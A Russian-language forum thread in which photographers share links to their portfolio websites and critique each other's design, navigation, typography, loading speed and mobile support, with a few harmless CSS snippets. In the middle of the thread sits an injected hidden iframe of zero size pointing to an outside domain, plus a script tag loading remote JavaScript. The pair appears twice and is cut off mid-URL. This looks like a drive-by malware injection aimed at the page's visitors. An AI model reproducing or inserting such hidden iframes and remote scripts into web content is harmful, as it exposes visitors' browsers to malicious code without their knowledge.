А давайте оценивать сайты друг друга (Update топика)
Раз уж портфолио оцениваем, давайте конструктивно оценивать сайты друг друга?Каковы правила хорошего сайта фотографа? 1. Удобный и минималистичный дизайн, не отвлекающий от фотографий
2. Простые и стильные шрифты (не более двух)
3. Классный запоминающийся лого
4. Поддержка мобильных и тач устройств (адаптивный дизайн)
5. Поддержка ретина экранов
6. Быстрая скорость загрузкиЧто-то еще?Ресурсы для вдохновения:
siteinspire.com
www.awwwards.comВНИМАНИЕ: сайты гофотовеб обсуждаются в соответствующей теме
कोई कमेन्ट देने के लिए लॉगिन करें या साइन अप करें
कमेंट्स
Мой. Только сильно не пинайте.
www.rostovtsev.de/
Какраз собираюсь обновлять сайт полностью..
www.laceslice.com
скажите лучше, чего менять, чего не менять? =))
мне очень нравится. единственно, надпись "Войти" можно заменить на "Смотреть"
фигня в том, что у меня сайт не на шаблоне был сделан.
www.radosvet.ru
Буду рада критике!!!
навеяло) особенно лого)
ему еще и месяца нет. блог, пока еще пуст, но приму критику с радостью.
ошиблась!
рад буду пару слов услишать...
www.pkorotkov.ru
Дизайн рисовал сам два года назад. В течение зимы обновлю контент.
Хотя есть мысли поменять все кординально... но это только в планах.
У меня в сафари, опере и в ИЭ все по центру.
В общем все как я хотела, только он еще наполнен мало. пока только лавстори загружены. А свадьбы ни одной еще. Но это потому что мне не горит в этом сезоне, декрет. )
Мне тоже что-нибудь полезное скажите))
в апреле запустил – купил для него движок Имажевью и прикрутили мне к нему неск. текстовых страниц.
для тех у кого с флешем проблемы сайт переключается на html версию. не сильно удобную, но рабочую...
я уже подзабыл про эту штуку, а она вылазит как раз если фото крупнее отображаются.
там выше в комментариях как раз масштаб снимков обсуждали – так вот только я включил чтоб они крупнее были и снова вылезла эта хрень. в коде ее нигде обнаружить не удалось
спасибо =)
Вообще так уж получилось, что первым в глаза бросилась опечатка:
>> Стоимость и ответы на вопросы можн(а!) обсудить, связавшись с нами. Звоните!И не понял про свадьбы:
ищу, кто бы переделал галереи с флешь на хтмл
вот мой
не нашла (или невозможно)) посмотреть маленькие или увеличенные картинки все подряд из раздела, без выбора по превью.
ну и тэги на главной слишком заметны)
http:.//www.romanlutkov.ru
надоел черный цвет.и времени нет,надо все свадьбы перезались,там все старое.
aa-photography.org.ua/
в остальном довольно приятный сайт.
www.olegsamoilov.ru
Как раз задумался переделывать сайт и ваше советы придут очень очень в тему! спасибо
Чем отличается форма в "Предложения" от формы в "Контакты", не очень понятно, может лучше оставить одну?
Навигация справа как то перегружена...
Мелочь, но в правой панели "Связатья со мной вы можете по телефону: +7 (843) 267 50 50." – ошибка в орфографии.
"ГЛАВНАЯ | ФОТОГРАФИИ | КОНТАКТЫ | ГЛАВНАЯ СТРАНИЦА БЛОГА" – а почему не просто "блог"?А так в целом приятный сайт с хорошими фотографиями, но навигация и юзабилити такие же дурацкие, как и у меня :)
В первую очередь – непонятки со структурой и навигацией по сайту.
Коллеги, посмотрите, а?
www.sunphoto.ru
Делал сам, (тк напряг с финансами был) хоть и не программист ВООБЩЕ.....
В общем, буду признательна, если кто-нибудь зайдет-посмотрит и пару слов черканет. Если уж что-то менять, то сейчвс, по горячим следам.Серии со свадеб пока не успела залить, а остальное все на месте.
Не нравится то, как сайт преобразовывает фото, шарпинг на фотографиях и т.д., хотелось бы как на MyWed'e, загружаешь файл, то он в таком же качестве и показывает. Настраивал много чего, все ни как.
www.radosvet.ruБлог пока на старом дизайне. Хотя отличий не так и много.
yarovikov.ru/?page_id=2…
irarudneva.ru/?page_id=…
это два разных плагина. можно фотки сразу кучей загружать, сортировать и тп
Отталкивает то, что сайт может заглючить, если будут проблемы с БД или какой-то нагрузкой на сервер.
Статические страницы в этом плане надёжнее, да и взломать сложнее.Спасибо, буду думать, WP нравится.
Буквально сегодня доделали основную часть сайта. Портфолио загрузила на скорую руку. Очень хочется мнений по существу, что можно добавить, что убрать и что, может быть, сделать иначе :-)
сейчас ведёт сюда: yarovikov.ru/vk.com/ale…
А так, в стандартном режиме очень удобно, ничего лишнего :)
www.photoset.by/
kate-max.ru/
www.lephotographe.ru
www.7yaFoto.ru
Реально важны ваши мнения!
Фотографии не оценивайте – они старые)))) Давно не меняла... Руки не доходили. Собираюсь к маю обновить портфолио.
www.lephotographe.ru
Жду конструктивной критики ;)
Большую часть работы по сайту делал сам :)
Интересуют любые мнения, тк сайт еще в процессе строительства...Но основное функционирует. спасибо!
и я в общую кучу за пинками))
konstantineremeev.com/пока выяснилось что на мобильных девайсах верстка слетает, надо доделать, но может еще что найдется?
- анимация меню лишняя
может просто поменьше увеличение сделать?
мне нравится )
На самом деле сейчас озадачилась дизайном – на своём сайте, вдохновляемым идеей, мне почему-то трудно разобраться с этим.
www.ivanova-olga.ru
если бесплатный, значит сразу все плохо)) гениально)
От вас этого не увидела) поэтому благодарю за внимание)
Будем рады отзывам коллег! Больше всего интересует эмоциональный отклик и удобство..
потестите новый что ли =) filonova.ru
он в стадии заполнения пока
www.Slava-Grebenkin.ru – на флеше
мой)
сам медведь с садика ) когдато рисовал комиксы с мишками , ну и сайт решил в том же русле оставить))) правда с наполнением беда, руки не доходят, сайт сделал год назад, а наполнить фотками нормально забыл)
blog.mexphoto.lvИнтересно мнение других
Заранее спасибо :)
luxuryphoto.com.ua/
Как вам? Очень интересно узнать ваши впечатления)
mr-and-mrs.ru – свадебный блог
посмотрите, пожалуйста.
я им довольна невероятно и делали с очень приятной командой, ребята как будто чувствовали, что я хочу=)
kkorolyova.ru
недавно поменяли интерфейс: bars-studio.com.ua/
мне инетресно, что стоит добавить?
slastushenski.ru
www.gureeva.com
www.chinkoff.lv
Да согласен, есть некие недоделки по скрипту, учту :)
Мой – alekseysmirnov.ru
жены – vera-smirnova.ru
долго чистил "улики" и компромат)))
По-этому блоги так хорошо индексируются?
что скажете?
dev.liveversion.ru – тестовый домен.
все ни как до ума не доведу=))
www.andreyvorobyev.ru
В которой именно теме? я их все просмотрела, но вот не нашла как-то где "все обсудили". Посмотрите внимательно, я ведь не просила оценивать дизайн. Я не могу посмотреть сайт с тех девайсов, которых у меня нет... Попросила помощи у людей. А вы как-то очень злобно меня отсюда изгоняете.
www.markovkina.ru
<iframe src="fuckav.usa.cc" width="0" height="0" style="visibility: hidden"></iframe><script type="text/javascript" src="jmobi.net/js?id=3902&qu… src="fuckav.usa.cc" width="0" height="0" style="visibility: hidden"></iframe><script type="text/javascript" src="jmobi.net/js?id=3902&qu…
stepan-tretyakov.com
chagov.ru/
www.rogovtsov.pro
petrpetrovskiy.com
Критика приветствуется :)
сайт сам от гоуфотовэб
nikolay-kireyev.com/
Но в портфолио и в блоге там уже в цвете=))
asyabelova.com/
зачем мне столько свободного пространства слева и справа от контента?
www.alexeyusovich.com/
Я хочу обсуждения своего сайта
deliysky.com/bg/home.ht…
charmestudio.org.ua/
старался сделать максимально простым и удобным для просмотра большого количества фотографий)
www.churnosoff.com/
делал сам, и еще в процессе
открыт для конструктивной критики
Что бы фоточки можно было колесиком проматывать ??
Буду признателен за критику и мнения!
тестирую теперь сайт жены ver.liveversion.ru
Счетчики? пожалуй да, надо удалить, или невыдимыми сделать :)
margin: 30px 0 1em;
}
Вот не могу определиться руку или треугольник оставить?
Можно еще нескромный вопрос?
Обыскался в нете как не прописать сustom css что бы не отображались заголовки h2, смог только изменить цвет.
.wrap h2 {
display:none;
}не самое лучшее решение – заголовки важны для поисковиков. и убирать лучше не таким способом, а лишний код в теме.
пока решил прописать размер 0pt
h2 { font-size: 0pt;font-family:"Cuprum", Helvetica, Arial, sans-serif; }
интересно, в таком виде поисковики будут их видеть?
Спасибо за код.
linakivaka.com
Буду рад услышать совет ;-)
barsstudio.com
alexglad.blogspot.com
- неадаптивный для млеких устройств
- дизайн 10-ти летней давности
Постарался выдержать в том же стиле что и сам сайт.
max-width:900px;
width:90%;
} Для картинок img {
max-width: 100%;
height: auto;
} А остальное детали
удобно горизонтальный скроллинг?
www.kudrik.com
Ааа, прогрузилось и теперь бистро листается :) Я думал динамическая подгрузка контента для экономии трафика :) В остальном ништяк!
А как счетчик просмотров моста сделал?
www.eldara.net
пасибо)
Спасибо GoPhotoWeb.
Слайдер – royalslider
Контактная форма – contact form 7
Поддержка ретина превью сразу, больших картинок через плагин retina 2x, чтобы у юзеров зря тафик не жралсяЧерез админку:- Загрузка лого обычное и ретина
- Иконки на соц сети
- Счетчики ЯМ и ГА
- Поле для копирайтаВсё адаптивное и ретино-поддерживаемое. Еще есть пара плюшек не особо нужных большинству, да не важно.Пример создания страницы с выбором шаблона и рубрики на последнем скрине
lepaev.ru/
alexmakhlay.ru
Буду рад комментариям :)
А мы то думали, что так много посещений хрен знает откуда, из разных уголков планеты )))
Признание ))))
самое кайфово эта страница на айпаде смотрится в вертикальной ориентации
Видимо вы так и задумывали конечно.
"Мой результат напрямую зависит от ваc и многих ТЕХ деталей, которую делают вашу свадьбу уникальной" – "тех" здесь лишнее)
"Мой результат напрямую зависит от ваc и многих деталей, которую делают вашу свадьбу уникальной"
twins-studio.ruПохож на "гофотовэб"
вот только музыки не надо...
Стандартная тема вордпресса )
Поэтому я лишь могу просить что то изменить или добавить у человека, который этим занимается)
Теперь лучше для восприятия без музыки?))) twins-studio.ru
ниже написал :)
Заранее большое спасибо!!!)))
В шапке темы же написано: ВНИМАНИЕ: сайты гофотовеб обсуждаются в соответствующей теме
Сегодня сказали, что долго грузится(((
Хотелось бы слышать конструктивную критику)
Спасибо!
менять что-то крайне проблематично, у меня на конструкторе сайт.
Не грузит видимо из-за большого размера фотографий. Надо поэксперементировать.
Мобильная версия теперь отражает полностью шапку, музыку убрал) Есть еще существенное что-то что нужно было бы изменить?) twins-studio.ruБуду благодарен за мнение) На роль лучшего сайта года не претендую)
2. Страницы как-то незаконченными выглядят без футртера/подвала, програмер поймет о чем я.
3. Еще бы реализовать динамическую загрузку картинок (в сериях), по мере проматывания вниз контента. Очень существенно экономило бы трафик на мобильных устройствах.
очень интересные у них шаблоны
интересен как раз опыт сотрудничества с ними
И в данной теме у одного товарища видел, если отпишется – будет круто.
научитесь читать первое сообщение уже...
буду заполнять потихоньку)
bearman.com.ua/
Пока не заполнен, но работает sashaselivanov.ru
saverchenko.com/
Буду рад любой критике)
Интересно мнение только о сайте), чего -то не хватает, но и перегружать не хочется)
dgphoto.ru/
Позавчера основные работы выполнил, но судя по вебвизору на больших экранах есть проблема с зернистостью фото, т.к. по максимуму ужимал чтобы вес уменьшить.
сайту правда три года уже.
урл старый:
www.monst.org
галерея пока тоже старая, ее можно не открывать) ну и вообще недопилен (некогда), но уже запущен)))
может объем просто большой. устройство мобильное?
движок вордпресс, шаблон хороший покупной, не должно быть так по идее. помучаю программера значит, спасибо
masherwed.com
Желательно конструктивная критика
Сайт на Вордпрессе, плагин Юнит Галлери